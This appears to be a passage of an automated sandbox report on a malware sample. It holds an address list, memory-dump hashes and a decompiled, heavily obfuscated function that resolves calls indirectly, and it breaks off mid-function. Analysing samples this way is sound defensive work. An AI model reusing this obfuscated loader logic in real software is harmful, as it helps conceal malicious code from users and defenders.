0x0333415f
0x03334169
0x0333416c
0x03334172
0x0333417c
0x0333417f
0x0333418b
0x03334192
0x03334198
0x03334199
0x0333419f
0x033341a6
0x033341a9
0x033341af
0x033341b6
0x033341b9
0x033341c2
0x033341c5
0x033341ce
0x033341d1
0x033341dd
0x033341e0
0x033341e5
0x033341e9
0x033341ec
0x033341ee
0x033341fc
0x033341fe
0x03334201
0x03334203
0x0333420a
0x0333420e
0x03334211
0x03334217
0x0333421e
0x03334221
0x0333422d
0x03334234
0x0333423a
0x0333423a
0x03334240
0x03334244
0x03334248
0x0333424b
0x03334252
0x03334255
0x03334258
0x03334261
0x03334264
0x0333426a
0x03334272
0x03334279
0x0333427f
0x03334282
0x03334289
0x0333428c
0x0333428f
0x03334296
0x03334299
0x0333429c
0x033342a3
0x033342a7
0x033342aa
0x033342b1
0x033342b4
0x033342b7
0x033342c6
0x033342c9
0x033342d0
0x033342d6
0x033342d9
0x033342e0
0x033342e6
0x033342f0
0x033342f3
0x033342fa
0x033342fd
0x03334300
0x03334306
0x0333430d
0x03334310
0x0333431c
0x0333431f
0x03334322
0x03334329
0x0333432a
0x0333432d
0x0333432e
0x0333433d
0x0333433f
0x03334344
0x03334346
0x0333434c
0x03334353
0x03334356
0x0333435c
0x03334366
0x03334369
0x03334369
0x03334371
0x03334378
0x0333437e
0x0333437f
0x03334386
0x0333438d
0x03334390
0x03334393
0x03334399
0x033343a0
0x033343a6
0x033343a9
0x033343b0
0x033343b7
0x033343ba
0x033343bd
0x033343c5
0x033343cc
0x033343d2
0x033343d2
0x03334551
0x03334555
0x03334558
0x0333455b
0x03334562
0x03334565
0x03334568
0x03334571
0x03334574
0x0333457a
0x03334584
0x03334587
0x03334593
0x03334596
0x03334599
0x033345a0
0x033345a1
0x033345a4
0x033345b2
0x033345b4
0x033345b7
0x033345b9
0x033345bf
0x033345c9
0x033345cc
0x033345d2
0x033345dc
0x033345df
0x033345e5
0x033345ec
0x033345f2
0x033345f2
0x033345fe
0x03334603
0x0333460d
0x03334611
0x03334614
0x0333461a
0x03334621
0x03334624
0x0333462b
0x0333462e
0x03334631
0x0333463d
0x03334644
0x0333464a
0x03334654
0x03334657
0x0333465b
0x0333465f
0x03334662
0x03334668
0x03334672
0x03334675
0x03334681
0x03334688
0x0333468e
0x03334695
0x03334698
0x033346a1
0x033346a5
0x033346af
0x033346b2
0x033346b9
0x033346bc
0x033346bf
0x033346c5
0x033346cf
0x033346d2
0x033346d8
0x033346e0
0x033346e7
0x033346f2
0x033346f5
0x033346f8
0x03334700
0x03334704
0x0333470a
0x03334710
0x0333471a
0x0333471d
0x03334729
0x03334730
0x03334736
0x03334741
0x03334743
0x03334744
0x0333474a
0x03334754
0x03334757
0x0333475d
0x03334767
0x0333476a
0x03334773
0x03334776
0x03334781
0x03334788
0x0333478b
0x0333478e
0x03334791
0x03334792
0x03334793
0x033347a0
0x033347a5
0x033347a7
0x033347ad
0x033347b4
0x033347b7
0x033347bd
0x033347c4
0x033347c7
0x033347c7
0x033347cd
0x033347d4
0x033347da
0x033347dd
0x033347ed
0x033347f4
0x033347f7
0x033347fa
0x03334800
0x03334807
0x0333480a
0x03334812
0x03334819
0x0333481f
0x03334820
0x03334821
0x03334828
0x0333482b
0x0333482e
0x0333482f
0x03334832
0x03334835
0x03334836
0x03334839
0x0333483b
0x03334846
0x03334848
0x03334849
0x03334849
0x0333484d
0x03334850
0x03334853
0x03334856
0x03334857
0x0333485b
0x0333485c
0x0333485e
0x03334860
0x03334861
0x03334861
0x03334861
0x03334868
0x0333486b
0x0333486e
0x03334875
0x03334879
0x0333487c
0x03334883
0x03334887
0x0333488a
0x03334890
0x03334898
0x0333489f
0x033348a8
0x033348c1
0x03333a6d
0x03333a73
0x03333a76
0x03333a79
0x03333a7f
0x03333a89
0x03333a8c
0x03333a98
0x03333a9f
0x03333aa5
0x03333aa6
0x03333aad
0x03333ab0
0x03333ab3
0x03333aba
0x03333abd
0x03333ac0
0x03333ac7
0x03333aca
0x03333acd
0x03333ad4
0x03333ad8
0x03333adb
0x03333ae3
0x03333ae6
0x03333ae9
0x03333af0
0x03333af1
0x03333af4
0x03333af5
0x03333b04
0x03333b06
0x03333b0b
0x03333b0d
0x03333b14
0x03333b18
0x03333b1b
0x03333b24
0x03333b27
0x03333b2d
0x03333b2f
0x03333b36
0x03333b3c
0x03333b46
0x03333b4a
0x03333b4d
0x03333b50
0x03333b57
0x03333b5a
0x03333b5d
0x03333b63
0x03333b6d
0x03333b70
0x03333b79
0x03333b7c
0x03333b87
0x03333b8e
0x03333b91
0x03333b94
0x03333b97
0x03333b98
0x03333b99
0x03333ba4
0x03333ba6
0x03333bab
0x03333bad
0x03333bb3
0x03333bba
0x03333bbd
0x03333bc6
0x03333bc9
0x03333bc9
0x03333bcf
0x03333bd6
0x03333bdf
0x03333be5
0x03333bef
0x03333bf2
0x03333bf8
0x03333bff
0x03333c02
0x03333c08
0x03333c12
0x03333c15
0x03333c1c
0x03333c20
0x03333c23
0x03333c2f
0x03333c35
0x03333c39
0x03333c3c
0x03333c3f
0x03333c42
0x03333c43
0x03333c44
0x03333c4a
0x03333c4d
0x03333c50
0x03333c53
0x03333c55
0x03333c5c
0x03333c60
0x03333c63
0x03333c69
0x03333c70
0x03333c79
0x03333c7a
0x03333c7d
0x03333c80
0x03333c80
0x03333c8b
0x03333c91
0x03333c94
0x03333c9b
0x03333c9f
0x03333ca2
0x03333ca8
0x03333caf
0x03333cb2
0x03333cbe
0x03333cc5
0x03333ccb
0x03333ccc
0x03333cd3
0x03333cd7
0x03333cda
0x03333ce0
0x03333cea
0x03333ced
0x03333cf4
0x03333cf7
0x03333cfa
0x03333d00
0x03333d0a
0x03333d0d
0x03333d15
0x03333d18
0x03333d1f
0x03333d22
0x03333d25
0x03333d28
0x03333d29
0x03333d2a
0x03333d39
0x03333d3b
0x03333d40
0x03333d42
0x03333d48
0x03333d4f
0x03333d52
0x03333d59
0x03333d5c
0x03333d65
0x03333d66
0x03333d69
0x03333d6c
0x03333d6c
0x03333d7b
0x03333d84
0x03333d8b
0x03333d91
0x03333d92
0x03333d9b
0x03333d9e
0x03333da4
0x03333dab
0x03333dae
0x03333db4
0x03333dbe
0x03333dc1
0x03333dd0
0x03333dd7
0x03333dda
0x03333ddd
0x03333de0
0x03333de1
0x03333de2
0x03333ded
0x03333def
0x03333df4
0x03333df6
0x03333dfd
0x03333e00
0x03333e03
0x03333e0a
0x03333e0e
0x03333e11
0x03333e11
0x03333e19
0x03333e20
0x03333e26
0x03333e27
0x03333e27
0x03333e28
0x03333e2f
0x03333e32
0x03333e35
0x03333e3c
0x03333e3f
0x03333e42
0x03333e4e
0x03333e55
0x03333e5b
0x03333e5c
0x03333e63
0x03333e66
0x03333e69
0x03333e72
0x03333e7b
0x03333e7c
0x03333e7f
0x03333e82
0x03333e8d
0x03333e91
0x03333e94
0x03333e97
0x03333e9d
0x03333ea4
0x03333ead
0x03333eae
0x03333eb1
0x03333eb4
0x03333eba
0x03333ec0
0x03333eca
0x03333ecd
0x03333ed4
0x03333ed7
0x03333eda
0x03333ee0
0x03333eea
0x03333eed
0x03333ef6
0x03333ef9
0x03333eff
0x03333f02
0x03333f05
0x03333f0c
0x03333f10
0x03333f1e
0x03333f20
0x03333f23
0x03333f25
0x03333f2b
0x03333f35
0x03333f38
0x03333f3f
0x03333f43
0x03333f46
0x03333f4c
0x03333f52
0x03333f59
0x03333f5f
0x03333f60
0x03333f66
0x03333f6e
0x03333f75
0x03333f7e
0x03333f87
0x03333f8a
0x03333f90
0x03333f98
0x03333f9f
0x03333fa8
0x03333fa8

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72f08a90819b8a7d6b902a99b873cf3cacbcc3fbfee91f535511ca024593f170
Instruction ID: 598393983ed6a9a42542dd08b1bccf22befa5bfcd4cdef06d3c7e6ee9e029aac
Opcode Fuzzy Hash: 72f08a90819b8a7d6b902a99b873cf3cacbcc3fbfee91f535511ca024593f170
Instruction Fuzzy Hash: 93921172844608DFEF04DFA0C889BEEBBF5FF48310F1944AAD889AA145D7385564CF69

Uniqueness

Uniqueness Score: -1.00%

Function 03335262, Relevance: .7, Instructions: 740
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E03335262(signed int __ebx, signed int __ecx, void* __edi, signed int __esi) {
				signed int _t430;
				signed int _t432;
				intOrPtr _t438;
				signed int _t441;
				intOrPtr _t443;
				signed int _t445;
				void* _t447;
				signed int _t448;
				signed int _t451;
				signed int _t456;
				signed int _t462;
				void* _t463;
				signed int _t467;
				void* _t469;
				intOrPtr _t470;
				intOrPtr _t473;
				signed int _t475;
				void* _t476;
				signed int _t478;
				signed int _t483;
				signed int _t485;
				signed int _t488;
				signed int _t491;
				signed int _t495;
				void* _t497;
				void* _t498;
				signed int _t501;
				signed int _t506;
				signed int _t511;
				void* _t512;
				signed int _t514;
				void* _t516;
				signed int _t517;
				intOrPtr _t522;
				signed int _t523;
				signed int _t525;
				void* _t527;
				signed int _t528;
				signed int _t532;
				void* _t534;
				signed int _t535;
				signed int _t538;
				signed int _t541;
				intOrPtr _t544;
				signed int _t552;
				signed int _t554;
				void* _t555;
				signed int _t564;
				signed int _t567;
				signed int _t570;
				signed int _t572;
				signed int _t575;
				void* _t577;
				void* _t579;
				signed int _t586;
				signed int _t588;
				void* _t589;
				signed int _t594;
				signed int _t596;
				void* _t599;
				signed int _t601;
				signed int _t603;
				signed int _t609;
				void* _t612;
				signed int _t615;
				signed int _t618;
				signed int _t620;
				signed int _t623;
				signed int _t625;
				signed int _t627;
				signed int _t629;
				signed int _t632;
				signed int _t636;
				signed int _t639;
				signed int _t642;
				signed int _t645;
				signed int _t648;
				signed int _t651;
				signed int _t654;
				signed int _t657;
				void* _t660;
				signed int _t664;
				signed int _t666;
				signed int _t669;
				signed int _t672;
				signed int _t676;
				intOrPtr* _t680;
				signed int _t682;
				signed int _t685;
				signed int _t688;
				void* _t691;
				signed int _t693;
				void* _t694;
				signed int _t696;
				signed int _t701;
				signed int _t702;
				signed int _t705;
				void* _t706;
				signed int _t708;
				signed int _t709;
				signed int _t712;
				signed int _t715;
				signed int _t718;
				signed int _t729;
				signed int _t732;
				signed int _t733;
				signed int _t741;
				signed int _t744;
				void* _t745;
				signed int _t747;
				signed int* _t757;
				signed int* _t758;
				signed int* _t759;
				signed int* _t760;
				signed int* _t761;
				signed int* _t762;
				signed int* _t763;
				signed int* _t764;

				_t701 = __esi;
				_t564 = __ebx;
				 *(_t741 - 0x14) = 0;
				_push( *(_t741 - 0x14));
				 *_t757 =  *_t757 ^ __ebx + 0x0041c349;
				_push(_t632);
				 *_t757 =  *_t757 ^ _t632;
				 *_t757 =  *_t757 | __ebx + 0x0041c1b7;
				_t430 =  *((intOrPtr*)(__ebx + 0x41f068))();
				 *(_t741 - 0x14) = __ecx;
				 *(__ebx + 0x41cf63) =  *(__ebx + 0x41cf63) & 0x00000000;
				 *(__ebx + 0x41cf63) =  *(__ebx + 0x41cf63) ^ __ecx -  *(_t741 - 0x14) ^ _t430;
				_t676 =  *(__edi + 0x80);
				_t14 = _t564 + 0x41ce92; // 0x41ce92
				_push(_t741);
				 *_t757 =  *_t757 & 0x00000000;
				 *_t757 =  *_t757 + _t14;
				_t432 =  *((intOrPtr*)(__ebx + 0x41f060))();
				 *(_t741 - 0x10) = _t676;
				 *(__ebx + 0x41d0ab) =  *(__ebx + 0x41d0ab) & 0x00000000;
				 *(__ebx + 0x41d0ab) =  *(__ebx + 0x41d0ab) ^ _t676 & 0x00000000 ^ _t432;
				 *(_t741 - 0x10) = _t432;
				_push( *((intOrPtr*)(_t741 + 8)) +  *(_t741 - 0x10));
				_pop(_t680);
				_t25 = _t564 + 0x41cade; // 0x41cade
				_push(_t741);
				 *_t757 =  *_t757 & 0x00000000;
				 *_t757 =  *_t757 ^ _t25;
				_t26 = _t564 + 0x41c3a5; // 0x41c3a5
				_push(__ebx);
				 *_t757 =  *_t757 & 0x00000000;
				 *_t757 =  *_t757 | _t26;
				_t438 =  *((intOrPtr*)(__ebx + 0x41f068))();
				 *_t757 = _t741;
				 *((intOrPtr*)(__ebx + 0x41c073)) = _t438;
				_t744 = 0;
				do {
					if( *_t680 != 0) {
						 *_t46 =  *_t680;
						_t702 =  *(_t744 - 0x14);
						_t48 = _t564 + 0x41d32a; // 0x41d32a
						 *_t757 =  *_t757 & 0x00000000;
						 *_t757 =  *_t757 ^ _t48;
						_t49 = _t564 + 0x41cdb4; // 0x41cdb4
						 *_t757 =  *_t757 ^ _t744;
						 *_t757 = _t49;
						_t441 =  *((intOrPtr*)(_t564 + 0x41f068))(_t744, _t744);
						 *(_t564 + 0x41cada) =  *(_t564 + 0x41cada) & 0x00000000;
						 *(_t564 + 0x41cada) =  *(_t564 + 0x41cada) | _t632 & 0x00000000 ^ _t441;
						_t632 = _t632;
					} else {
						_t29 = _t570 + 0x41d076; // 0x41d076
						 *(_t744 - 0x10) = 0;
						 *_t761 =  *_t761 | _t29;
						_t552 =  *((intOrPtr*)(_t570 + 0x41f060))( *(_t744 - 0x10));
						 *(_t744 - 0x14) = _t701;
						 *(_t570 + 0x41d0ee) = 0 ^ _t552;
						_push( *(_t680 + 0x10));
						_pop( *_t37);
						_push( *(_t744 - 0x10));
						_pop(_t702);
						_t39 = _t570 + 0x41c2b0; // 0x41c2b0
						 *_t761 = _t39;
						_t554 =  *((intOrPtr*)(_t570 + 0x41f060))( *(_t744 - 0x10));
						 *(_t570 + 0x41c1b3) =  *(_t570 + 0x41c1b3) & 0x00000000;
						 *(_t570 + 0x41c1b3) =  *(_t570 + 0x41c1b3) | _t744 ^  *_t761 | _t554;
						_t744 = _t744;
					}
					_t636 =  *_t757;
					 *_t757 =  *(_t680 + 0x10);
					_t57 = _t564 + 0x41c661; // 0x41c661
					 *_t757 =  *_t757 ^ _t744;
					 *_t757 =  *_t757 + _t57;
					_t443 =  *((intOrPtr*)(_t564 + 0x41f060))(_t632);
					 *_t757 = _t702;
					 *((intOrPtr*)(_t564 + 0x41d31e)) = _t443;
					_t705 = 0;
					 *_t60 = _t744;
					_t61 = _t564 + 0x41c5b3; // 0x41c5b3
					 *_t757 = _t61;
					_t445 =  *((intOrPtr*)(_t564 + 0x41f060))( *(_t744 - 0x10));
					 *(_t744 - 0x14) =  *(_t744 - 0x14) & 0x00000000;
					 *_t757 =  *_t757 ^ _t445;
					_t67 = _t564 + 0x41c868; // 0x41c868
					 *_t757 =  *_t757 & 0x00000000;
					 *_t757 =  *_t757 ^ _t67;
					_t447 =  *((intOrPtr*)(_t564 + 0x41f060))( *(_t744 - 0x14));
					 *_t69 = _t680;
					_t586 = 0 ^  *(_t744 - 0x10);
					 *_t71 = _t447;
					 *(_t744 - 0x14) =  *(_t744 - 0x14) + _t586;
					_push( *(_t744 - 0x14));
					_pop(_t448);
					_t682 = _t680;
					 *(_t744 - 0x14) = _t448;
					_t588 = _t586 & 0x00000000 ^ _t448 & 0x00000000 ^  *(_t564 + 0x41c633);
					_t451 =  *(_t744 - 0x14);
					if(_t588 > _t451) {
						_t78 = _t564 + 0x41c5b3; // 0x41c5b3
						 *_t757 = _t78;
						_t80 = _t564 + 0x41c868; // 0x41c868
						 *(_t744 - 0x10) =  *(_t744 - 0x10) & 0x00000000;
						 *_t757 =  *_t757 | _t80;
						_t451 =  *((intOrPtr*)(_t564 + 0x41f064))( *(_t744 - 0x10),  *(_t744 - 0x14));
					}
					 *(_t744 - 0x10) = _t636;
					 *(_t564 + 0x41c2a0) =  *(_t564 + 0x41c2a0) & 0x00000000;
					 *(_t564 + 0x41c2a0) =  *(_t564 + 0x41c2a0) | _t636 & 0x00000000 ^ _t451;
					_t639 =  *(_t744 - 0x10);
					 *(_t744 - 0x10) = _t564;
					_t567 =  *(_t744 - 0x10);
					 *_t757 =  *_t757 & 0x00000000;
					 *_t757 =  *_t757 | _t451 & 0x00000000 | _t564 & 0x00000000 ^  *(_t744 + 8);
					_t94 = _t567 + 0x41c812; // 0x41c812
					 *_t757 =  *_t757 & 0x00000000;
					 *_t757 =  *_t757 + _t94;
					_t95 = _t567 + 0x41ca65; // 0x41ca65
					 *_t757 =  *_t757 & 0x00000000;
					 *_t757 =  *_t757 | _t95;
					_t456 =  *((intOrPtr*)(_t567 + 0x41f068))(_t588, _t705);
					 *(_t744 - 0x14) = _t682;
					 *(_t567 + 0x41d25f) =  *(_t567 + 0x41d25f) & 0x00000000;
					 *(_t567 + 0x41d25f) =  *(_t567 + 0x41d25f) ^ (_t682 -  *(_t744 - 0x14) | _t456);
					_t685 =  *(_t744 - 0x14);
					 *_t104 = _t588;
					 *_t757 =  *_t757 ^ _t705;
					_push( *((intOrPtr*)(_t744 - 8)));
					_pop(_t706);
					 *((intOrPtr*)(_t744 - 8)) = _t706 +  *(_t744 - 0x10);
					_t708 = 0;
					_t108 = _t567 + 0x41d15d; // 0x41d15d
					 *_t757 =  *_t757 - _t588;
					 *_t757 = _t108;
					_t109 = _t567 + 0x41c260; // 0x41c260
					 *(_t744 - 0x10) = 0;
					 *_t757 =  *_t757 | _t109;
					_push( *((intOrPtr*)(_t567 + 0x41f068))( *(_t744 - 0x10), _t588));
					_pop( *_t113);
					_push( *(_t744 - 0x10));
					_pop( *_t115);
					_push( *((intOrPtr*)(_t685 + 0xc)));
					_pop( *_t117);
					_push( *(_t744 - 0x14));
					_pop(_t589);
					 *_t757 =  *_t757 & 0x00000000;
					 *_t757 =  *_t757 + _t589;
					_t119 = _t567 + 0x41ca52; // 0x41ca52
					 *_t757 =  *_t757 - _t567;
					 *_t757 =  *_t757 + _t119;
					_t462 =  *((intOrPtr*)(_t567 + 0x41f060))(_t567, _t567);
					 *(_t744 - 0x14) = _t639;
					 *(_t567 + 0x41cd09) =  *(_t567 + 0x41cd09) & 0x00000000;
					 *(_t567 + 0x41cd09) =  *(_t567 + 0x41cd09) | _t639 -  *(_t744 - 0x14) ^ _t462;
					_t642 =  *(_t744 - 0x14);
					_t758 = _t757 - 0xfffffffc;
					_push(0);
					 *_t758 =  *_t758 | _t462;
					_push( *_t757);
					_pop(_t463);
					 *_t758 = _t463 +  *(_t744 + 8);
					_t130 = _t567 + 0x41c07f; // 0x41c07f
					 *_t758 = _t130;
					_t467 =  *((intOrPtr*)(_t567 + 0x41f060))( *(_t744 - 0x10),  *(_t744 - 0x14));
					 *_t758 =  *_t758 - _t642;
					 *_t758 =  *_t758 | _t467;
					_t133 = _t567 + 0x41d248; // 0x41d248
					 *(_t744 - 0x14) =  *(_t744 - 0x14) & 0x00000000;
					 *_t758 =  *_t758 | _t133;
					_t469 =  *((intOrPtr*)(_t567 + 0x41f060))( *(_t744 - 0x14), _t642);
					_t594 =  *_t758;
					_t759 =  &(_t758[1]);
					 *(_t744 - 0x10) = _t567;
					_push(_t594 + _t469);
					_t570 =  *(_t744 - 0x10);
					_pop(_t470);
					_t596 = _t594 & 0x00000000 ^ _t642 -  *_t759 ^  *(_t570 + 0x41d0e6);
					_t645 = _t642;
					if(_t596 > _t470) {
						_t141 = _t570 + 0x41c07f; // 0x41c07f
						 *(_t744 - 0x14) =  *(_t744 - 0x14) & 0x00000000;
						 *_t759 =  *_t759 + _t141;
						_t145 = _t570 + 0x41d248; // 0x41d248
						 *(_t744 - 0x14) = 0;
						 *_t759 =  *_t759 | _t145;
						_t470 =  *((intOrPtr*)(_t570 + 0x41f064))( *(_t744 - 0x14),  *(_t744 - 0x14));
						 *(_t744 - 0x10) = _t708;
						 *((intOrPtr*)(_t570 + 0x41cd68)) = _t470;
						_t708 =  *(_t744 - 0x10);
					}
					_pop( *_t152);
					 *_t759 = _t596 & 0x00000000 ^  *(_t744 - 0x10);
					_t599 = _t708;
					_t709 = _t599 +  *(_t744 + 8);
					_t601 = 0;
					 *_t759 =  *_t759 & 0x00000000;
					 *_t759 =  *_t759 | _t601;
					_t155 = _t570 + 0x41d135; // 0x41d135
					 *_t759 = _t155;
					_t157 = _t570 + 0x41c60e; // 0x41c60e
					 *_t759 =  *_t759 & 0x00000000;
					 *_t759 =  *_t759 | _t157;
					_t473 =  *((intOrPtr*)(_t570 + 0x41f068))(_t601,  *(_t744 - 0x10), _t470);
					 *(_t744 - 0x14) = _t645;
					 *((intOrPtr*)(_t570 + 0x41c3e6)) = _t473;
					_t648 =  *(_t744 - 0x14);
					_t603 =  *_t759;
					_t760 = _t759 - 0xfffffffc;
					 *_t760 =  *_t760 - _t648;
					 *_t760 =  *_t760 ^ _t603;
					_t162 = _t570 + 0x41c220; // 0x41c220
					 *(_t744 - 0x14) = 0;
					 *_t760 =  *_t760 + _t162;
					_t475 =  *((intOrPtr*)(_t570 + 0x41f060))( *(_t744 - 0x14), _t648);
					 *(_t744 - 0x10) = _t603;
					 *(_t570 + 0x41cf1d) =  *(_t570 + 0x41cf1d) & 0x00000000;
					 *(_t570 + 0x41cf1d) =  *(_t570 + 0x41cf1d) ^ (_t603 ^  *(_t744 - 0x10) | _t475);
					_t476 =  *((intOrPtr*)(_t570 + 0x41f054))();
					 *(_t744 - 0x14) = 0;
					 *_t760 =  *_t760 + _t476;
					_t176 = _t570 + 0x41c49b; // 0x41c49b
					 *(_t744 - 0x10) = 0;
					 *_t760 =  *_t760 + _t176;
					_t478 =  *((intOrPtr*)(_t570 + 0x41f060))( *(_t744 - 0x10),  *(_t744 - 0x14));
					 *(_t744 - 0x14) = _t709;
					 *(_t570 + 0x41c8aa) =  *(_t570 + 0x41c8aa) & 0x00000000;
					 *(_t570 + 0x41c8aa) =  *(_t570 + 0x41c8aa) | _t709 & 0x00000000 ^ _t478;
					_t712 =  *(_t744 - 0x14);
					_t761 = _t760 - 0xfffffffc;
					 *(_t744 - 0x10) = _t648;
					 *(_t744 - 4) =  *(_t744 - 4) & 0x00000000;
					 *(_t744 - 4) =  *(_t744 - 4) ^ _t648 -  *(_t744 - 0x10) ^ _t478 & 0x00000000 ^  *_t760;
					_t651 =  *(_t744 - 0x10);
					_t193 = _t570 + 0x41c279; // 0x41c279
					 *_t761 = _t193;
					_t195 = _t570 + 0x41d1ea; // 0x41d1ea
					 *_t761 =  *_t761 - _t712;
					 *_t761 = _t195;
					_t483 =  *((intOrPtr*)(_t570 + 0x41f068))(_t712,  *(_t744 - 0x14));
					 *(_t744 - 0x14) =  *(_t744 - 0x10);
					 *(_t570 + 0x41cbc5) = 0 ^ _t483;
					_t609 =  *(_t744 - 0x14);
					do {
						if(( *_t712 & 0x80000000) != 0) {
							_t761[1] =  *_t712;
							_t572 = _t570;
							 *_t761 =  *_t761 ^ _t712;
							 *_t761 =  *_t761 ^ _t572 + 0x0041d099;
							_t485 =  *((intOrPtr*)(_t572 + 0x41f060))(_t744);
							 *_t761 = _t609;
							 *(_t572 + 0x41c24c) = 0 ^ _t485;
							_t612 = 0;
							 *_t299 = _t712;
							 *_t761 =  *_t761 & 0x00000000;
							 *_t761 =  *_t761 + _t572 + 0x41cdd2;
							 *_t761 =  *_t761 & 0x00000000;
							 *_t761 =  *_t761 | _t572 + 0x0041c846;
							_t488 =  *((intOrPtr*)(_t572 + 0x41f068))(_t744, _t685);
							 *(_t744 - 0x10) = _t651;
							 *(_t572 + 0x41c9fe) = 0 ^ _t488;
							_t654 =  *(_t744 - 0x10);
							 *(_t744 - 0xc) =  *(_t744 - 0xc) & 0x0000ffff;
							 *_t761 =  *_t761 ^ _t654;
							 *_t761 =  *_t761 | _t572 + 0x0041c9e4;
							 *_t761 =  *_t761 & 0x00000000;
							 *_t761 =  *_t761 ^ _t572 + 0x0041c746;
							_t491 =  *((intOrPtr*)(_t572 + 0x41f068))(_t654, _t654);
							 *(_t744 - 0x14) = _t654;
							 *(_t572 + 0x41c559) =  *(_t572 + 0x41c559) & 0x00000000;
							 *(_t572 + 0x41c559) =  *(_t572 + 0x41c559) ^ (_t654 ^  *(_t744 - 0x14) | _t491);
							_t657 =  *(_t744 - 0x14);
						} else {
							_t202 = _t570 + 0x41c8e1; // 0x41c8e1
							 *_t761 =  *_t761 - _t651;
							 *_t761 =  *_t761 | _t202;
							_t525 =  *((intOrPtr*)(_t570 + 0x41f060))(_t651);
							 *(_t744 - 0x10) = 0;
							 *_t761 =  *_t761 | _t525;
							_t206 = _t570 + 0x41c6e2; // 0x41c6e2
							 *_t761 =  *_t761 - _t570;
							 *_t761 =  *_t761 | _t206;
							_t527 =  *((intOrPtr*)(_t570 + 0x41f060))(_t570,  *(_t744 - 0x10));
							_t623 = (_t609 & 0x00000000) +  *_t761;
							_t764 = _t761 - 0xfffffffc;
							 *_t764 =  *_t764 + _t685;
							_t691 = _t527;
							_t528 = _t691 + _t623;
							_t693 = 0;
							 *(_t744 - 0x10) = _t651;
							_t625 = _t623 & 0x00000000 ^ _t651 ^  *(_t744 - 0x10) ^  *(_t570 + 0x41c521);
							_t664 =  *(_t744 - 0x10);
							if(_t625 > _t528) {
								_t212 = _t570 + 0x41c8e1; // 0x41c8e1
								 *_t764 =  *_t764 & 0x00000000;
								 *_t764 =  *_t764 | _t212;
								_t213 = _t570 + 0x41c6e2; // 0x41c6e2
								 *_t764 = _t213;
								_t528 =  *((intOrPtr*)(_t570 + 0x41f064))( *(_t744 - 0x10), _t712);
							}
							 *(_t570 + 0x41c56c) =  *(_t570 + 0x41c56c) & 0x00000000;
							 *(_t570 + 0x41c56c) =  *(_t570 + 0x41c56c) ^ (_t744 & 0x00000000 | _t528);
							_t744 = _t744;
							 *_t764 =  *_t764 & 0x00000000;
							 *_t764 =  *_t764 + _t712;
							_t220 = _t570 + 0x41c266; // 0x41c266
							 *_t764 = _t220;
							_push( *((intOrPtr*)(_t570 + 0x41f060))( *(_t744 - 0x10), _t528));
							_pop( *_t223);
							_push( *(_t744 - 0x10));
							_pop( *_t225);
							_t729 =  *_t712;
							_t226 = _t570 + 0x41ce1f; // 0x41ce1f
							 *_t764 =  *_t764 & 0x00000000;
							 *_t764 =  *_t764 ^ _t226;
							_t532 =  *((intOrPtr*)(_t570 + 0x41f060))(_t729);
							 *(_t744 - 0x10) = 0;
							 *_t764 =  *_t764 ^ _t532;
							_t230 = _t570 + 0x41c0ad; // 0x41c0ad
							 *(_t744 - 0x14) =  *(_t744 - 0x14) & 0x00000000;
							 *_t764 =  *_t764 | _t230;
							_t534 =  *((intOrPtr*)(_t570 + 0x41f060))( *(_t744 - 0x14),  *(_t744 - 0x10));
							_pop( *_t235);
							_t627 = _t625 & 0x00000000 |  *(_t744 - 0x14);
							 *_t237 = _t534;
							 *(_t744 - 0x10) =  *(_t744 - 0x10) + _t627;
							_push( *(_t744 - 0x10));
							_pop(_t535);
							_t666 = _t664;
							 *(_t744 - 0x10) = _t729;
							_t629 = _t627 & 0x00000000 | _t729 & 0x00000000 ^  *(_t570 + 0x41c765);
							_t732 =  *(_t744 - 0x10);
							if(_t629 > _t535) {
								_t244 = _t570 + 0x41ce1f; // 0x41ce1f
								 *_t764 = _t244;
								_t246 = _t570 + 0x41c0ad; // 0x41c0ad
								 *_t764 =  *_t764 & 0x00000000;
								 *_t764 =  *_t764 | _t246;
								_t535 =  *((intOrPtr*)(_t570 + 0x41f064))(_t744,  *(_t744 - 0x14));
							}
							 *_t764 = _t666;
							 *(_t570 + 0x41c497) = 0 ^ _t535;
							_t669 = 0;
							 *_t764 = _t693;
							_t694 = _t732;
							_t733 = _t694 +  *(_t744 + 8);
							_t696 = 0;
							_t250 = _t570 + 0x41d159; // 0x41d159
							 *(_t744 - 0x14) =  *(_t744 - 0x14) & 0x00000000;
							 *_t764 =  *_t764 ^ _t250;
							_t254 = _t570 + 0x41d213; // 0x41d213
							 *(_t744 - 0x10) = 0;
							 *_t764 =  *_t764 + _t254;
							_t538 =  *((intOrPtr*)(_t570 + 0x41f068))( *(_t744 - 0x10),  *(_t744 - 0x14));
							 *(_t744 - 0x14) = _t733;
							 *(_t570 + 0x41d182) =  *(_t570 + 0x41d182) & 0x00000000;
							 *(_t570 + 0x41d182) =  *(_t570 + 0x41d182) ^ (_t733 ^  *(_t744 - 0x14) | _t538);
							_t612 = _t629;
							_t265 = _t570 + 0x41c85c; // 0x41c85c
							 *_t764 =  *_t764 & 0x00000000;
							 *_t764 =  *_t764 | _t265;
							_t266 = _t570 + 0x41c10e; // 0x41c10e
							 *_t764 = _t266;
							_t541 =  *((intOrPtr*)(_t570 + 0x41f068))( *(_t744 - 0x14), _t669);
							 *(_t570 + 0x41ce00) =  *(_t570 + 0x41ce00) & 0x00000000;
							 *(_t570 + 0x41ce00) =  *(_t570 + 0x41ce00) | _t669 & 0x00000000 | _t541;
							_t672 = _t669;
							_push( *(_t744 - 0x14) + 2);
							_pop( *_t273);
							_push( *(_t744 - 0x14));
							_pop( *_t275);
							_t276 = _t570 + 0x41c9a3; // 0x41c9a3
							 *(_t744 - 0x14) =  *(_t744 - 0x14) & 0x00000000;
							 *_t764 =  *_t764 ^ _t276;
							_t280 = _t570 + 0x41d1fa; // 0x41d1fa
							 *_t764 = _t280;
							_t544 =  *((intOrPtr*)(_t570 + 0x41f068))( *(_t744 - 0x14),  *(_t744 - 0x14));
							 *_t764 = _t672;
							 *((intOrPtr*)(_t570 + 0x41d0fe)) = _t544;
							_t657 = 0;
							_t712 = 0 ^  *_t764;
							_t761 =  &(_t764[1]);
							_t284 = _t570 + 0x41d0af; // 0x41d0af
							 *_t761 =  *_t761 & 0x00000000;
							 *_t761 =  *_t761 | _t284;
							_t285 = _t570 + 0x41ceae; // 0x41ceae
							 *_t761 = _t285;
							_t491 =  *((intOrPtr*)(_t570 + 0x41f068))( *(_t744 - 0x10), _t612);
							 *(_t744 - 0x10) = _t696;
